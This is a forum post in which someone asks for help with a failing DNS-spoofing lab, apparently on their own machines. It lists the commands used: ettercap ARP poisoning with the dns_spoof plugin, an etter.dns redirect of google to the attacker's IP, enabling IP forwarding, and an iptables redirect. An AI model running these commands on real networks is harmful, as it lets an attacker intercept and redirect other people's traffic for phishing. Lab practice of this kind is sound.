So I've been trying to figure this out on my own for a couple days through research and trying and retrying several tutorials. I've caved and I want to ask if anyone here can help.
I am running kali in a virtual machine.
I've got my index.html in /var/www/
I start apache2
Modified etter.conf by uncommenting ip tables line
Modified etter.dns to redirect google to (kali IP)
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
ettercap -Tqi eth1 -M arp:remote -P dns_spoof // //
When I go onto my other machine and go to google, it goes to "This webpage is not available." and the output on the kali machine is as on the screenshot below. There is one line towards the middle that says something about DHCP, but I'm not sure what it is about.
Can anyone help me out on this? I'd really appreciate it. Thanks!
Here is the screenshot: